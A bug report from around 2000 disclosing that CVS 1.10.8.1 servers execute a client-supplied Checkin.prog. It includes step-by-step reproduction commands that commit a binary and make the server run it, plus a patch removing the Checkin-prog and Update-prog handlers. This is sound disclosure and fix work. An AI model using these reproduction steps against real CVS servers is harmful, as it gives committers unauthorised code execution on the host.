>Submitter-Id: net
>Originator: Tanaka Akira
>Organization:
net
>Confidential: no
>Synopsis: Checkin.prog and Update.prog is enabled even with remote repository.
>Severity: critical
>Priority: high
>Category: cvs
>Class: sw-bug
>Release: cvs-1.10.8.1
>Environment:
System: Linux serein.m17n.org 2.2.14-5k4 #1 Sun Mar 12 15:33:30 PST 2000 i686 unknown
Architecture: i686
--------------------------------------------------------------------------------
>Description:
A committer can execute arbitrary binary on a cvs server using
Checkin.prog. Usually CVS/Checkin.prog in a working directory is
copied from CVSROOT/modules when the directory is checkouted and it is
sent back to the server and executed with committing. Note that when
it is executed, committed files are exsists in a current directory.
Since a working directory can be modified by a committer which have
the working directory, Checkin.prog may be modified or even newly
created. If an evil committer do it, cvs server executes such forged
Checkin.prog. Also note that the evil committer can create arbitrary
binary file by `cvs add -kb' and `cvs commit'. So the evil committer
can execute just committed binary file by via Checkin.prog triggerd by
the `cvs commit'.
If the server admin provides general shell access to committers, this
is not so big problem. But if the admin doesn't want to provide it,
this is a security problem.
Because cvs.texinfo says follows, I think this behaviour
--- Checkin.prog and Update.prog is working --- is not intentional.
Note also that the commit and update programs work ONLY when using
local repository access - the files simply aren't created when sources
are checked out from a pserver or other remote CVS.
>How-To-Repeat:
% cvs -d :pserver:test@localhost:/tmp/cvs -f co somemodule
cvs server: Updating somemodule
% cd somemodule
% cp /bin/ls binary
% cvs add -kb binary
cvs server: scheduling file `binary' for addition
cvs server: use 'cvs commit' to add this file permanently
% echo ./binary > CVS/Checkin.prog
% cvs commit -m 'test'
cvs commit: Examining .
RCS file: /tmp/cvs/somemodule/binary,v
done
Checking in binary;
/tmp/cvs/somemodule/binary,v <-- binary
initial revision: 1.1
done
cvs server: Executing ''./binary' '/tmp/cvs/somemodule''
#cvs.lock
#cvs.wfl.serein.m17n.org.14330
binary,v
% cvs -v
Concurrent Versions System (CVS) 1.10.8 (client/server)
Copyright (c) 1989-1998 Brian Berliner, david d `zoo' zuhn,
Jeff Polk, and other authors
CVS may be copied only under the terms of the GNU General Public License,
a copy of which can be found with the CVS distribution kit.
Specify the --help option for further information about CVS
%
>Fix:
--- server.c- Fri Apr 28 15:37:13 2000
+++ server.c Fri Apr 28 15:38:06 2000
@@ -4553,8 +4553,6 @@
REQ_LINE("Max-dotdot", serve_max_dotdot, 0),
REQ_LINE("Static-directory", serve_static_directory, 0),
REQ_LINE("Sticky", serve_sticky, 0),
- REQ_LINE("Checkin-prog", serve_checkin_prog, 0),
- REQ_LINE("Update-prog", serve_update_prog, 0),
REQ_LINE("Entry", serve_entry, RQ_ESSENTIAL),
REQ_LINE("Kopt", serve_kopt, 0),
REQ_LINE("Checkin-time", serve_checkin_time, 0),
